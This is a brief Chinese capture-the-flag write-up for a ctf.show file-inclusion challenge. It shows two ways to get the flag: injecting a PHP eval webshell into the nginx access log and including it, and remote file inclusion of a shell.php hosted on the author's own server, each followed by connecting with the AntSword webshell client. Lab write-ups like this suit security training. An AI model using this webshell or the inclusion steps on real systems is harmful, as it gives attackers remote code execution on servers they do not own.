打開靶機
發現與web3很相似,測試文件包含未成功
此題有兩種解決方法
一、日志注入
查看日志的默認目錄,得到了日志文件
?url=/var/log/nginx/access.log
進行日志注入
<?php @eval($_POST['a']);?>
這里需要把一句話木馬加在參數里面
用蟻劍進行連接測試
連接成功,在www目錄下發現flag.txt文件
查看flag.txt文件內容
成功拿到flag
二、遠程文件包含
重新開啟一個靶機環境
在購買的阿里雲服務器中編寫一句話木馬(阿里雲服務器已啟動http協議),添加abc是為了測試是否成功
https://b297bb10-8978-4c85-a1cc-027ebb8a9015.chall.ctf.show/?url=http://xxx.xxx.xxx.xxx/shell.php
看到abc說明測試成功,使用蟻劍或菜刀去連接,這里我使用的是蟻劍,測試連接
在www目錄下發現flag
查看flag.txt內容
成功拿到flag